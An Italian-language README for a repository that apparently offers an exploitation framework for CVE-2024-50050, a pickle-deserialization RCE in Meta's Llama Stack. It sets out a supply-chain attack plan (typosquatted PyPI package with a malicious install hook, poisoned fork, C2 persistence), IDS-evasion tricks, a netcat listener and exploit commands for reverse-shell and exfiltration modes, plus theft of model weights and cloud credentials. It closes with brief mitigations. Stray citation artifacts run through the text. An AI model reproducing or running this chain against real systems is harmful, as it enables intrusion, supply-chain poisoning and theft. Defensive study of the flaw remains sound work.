
LlamaStack-RCE: Framework deterministico di sfruttamento e indurimento della supply chain [CVE-2024-50050] Focus su ricerca sulla sicurezza IA AI-SupplyChain-Poisoning: Laboratorio avanzato di manipolazione degli opcode PVM e iniezione ZeroMQ
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE è un framework di simulazione e sfruttamento ad alta fedeltà che mira a CVE-2024-50050, una vulnerabilità critica di Remote Code Execution (RCE) nello Meta Llama Stack. La vulnerabilità deriva da deserializzazione non sicura all'interno dell'API di inferenza basata su Python, in particolare attraverso l'uso del modulo sui layer di trasporto ZeroMQ (0MQ).
pickleQuesto repository fornisce l'intera catena di attacco, dall'avvelenamento della supply chain a monte fino all'esecuzione a valle e all'esfiltrazione dei pesi del modello.
Il cuore dell'exploit mira alla Pickle Virtual Machine (PVM). Utilizzando l'opcode GLOBAL, possiamo forzare la PVM a importare qualsiasi modulo Python disponibile ed eseguire funzioni arbitrarie durante il processo di unpickling.
Vettore d'Attacco: ZeroMQ Socket -> Raw Byte Stream -> pickle.loads() -> RCE.
Per bypassare gli IDS tradizionali basati su firma (Snort/Suricata), il framework implementa la codifica polimorfa:
Esecuzione Annidata Base64: Incapsula i comandi shell in Base64 per nascondere stringhe letterali come /bin/bash o os.system.
Offuscamento degli Opcode: Riordina le istruzioni della PVM per cambiare le firme binarie senza alterare la logica di esecuzione.
Contrabbando di Pacchetti: Frammenta il payload pickle in più frame ZeroMQ per eludere il rilevamento delle anomalie basate sul volume.
Il framework simula una weaponizzazione olistica della supply chain:
| Fase | Strategia | Implementazione Tecnica |
|---|---|---|
| I: A monte | Typosquatting | Registrazione di metalama-stack su PyPI con un PostInstallCommand malevolo in setup.py. |
|
| II: Distribuzione | Fork Avvelenato | Fork ad alte prestazioni di Llama Stack su GitHub con un "Interprete Pickle Nascosto" in connection.py.
|
| III: Esecuzione | Trigger CI/CD | Esecuzione automatica durante pip install nell'ambiente Jenkins/GitHub Actions del bersaglio.
| | IV: Persistenza | Bomba Logica | Stager in background multi-stadio per accesso C2 a lungo termine e furto di modelli.
|
Hardware: 4x NVIDIA A100/H100 (per test locali dei pesi).
Sistema Operativo: Arch Linux o Kali Linux induriti.
Ambiente: Docker e Docker-Compose (Rete Isolata).
.
[cite_start]├── lab_validator.py # 7-stage automated validation suite [cite: 206, 264]
[cite_start]├── exploit_cve_2024_50050.py # Main exploitation framework [cite: 138, 206]
[cite_start]├── server.py # Vulnerable Llama Stack simulation [cite: 112, 150]
[cite_start]├── setup.py # Weaponized supply chain installer [cite: 110, 206]
[cite_start]├── post_exploit.py # Data harvesting & lateral movement [cite: 210, 264]
[cite_start]└── evasion_library.py # 12+ advanced evasion methods [cite: 264]
[cite_start]python lab_validator.py # Target: 100% Pass Rate [cite: 208, 209]
nc -lvnp 4444
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]
Uno sfruttamento riuscito garantisce il controllo assoluto sull'infrastruttura AI:
Furto di Proprietà Intellettuale: Furto dei pesi del modello .safetensors (valutati tra $10M e $100M+).
Dirottamento GPU: Allocazione non autorizzata di risorse CUDA per Cryptojacking o Shadow Training.
Manipolazione dell'Inferenza: Avvelenamento delle risposte del modello per causare guasti sistemici nelle applicazioni a valle (AI Medica/Legale).
Raccolta di Credenziali: Estrazione di chiavi AWS/GCP e configurazioni K8s da /proc/self/environ.
Per mitigare la CVE-2024-50050, devono essere applicate le seguenti regole assolute:
Eradicare Pickle: Sostituire tutti i pickle.loads() con safetensors.torch.load_file() o msgpack con schema rigoroso.
Indurimento ZMQ: Implementare ZMQ_CURVE con coppie di chiavi pubbliche/private e non associare mai a 0.0.0.0.
Isolamento dell'Infrastruttura: Eseguire i processi AI in gVisor o Kata Containers per prevenire la fuga dal container RCE.
Micro-segmentazione di Rete: Isolare il server di inferenza da Internet pubblico utilizzando regole di ingresso/uscita rigorosamente definite.
NOTA LEGALE: L'uso di questo framework per attaccare bersagli senza preventiva autorizzazione scritta è illegale. È fornito esclusivamente a scopo didattico e per test di penetrazione autorizzati. L'autore (Sastra_Adi_Wiguna) non si assume alcuna responsabilità per un uso improprio.
DOCUMENTO CLASSIFICATO: PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 STATO DETERMINISTICO: PRONTO PER LA PRODUZIONE (98/100)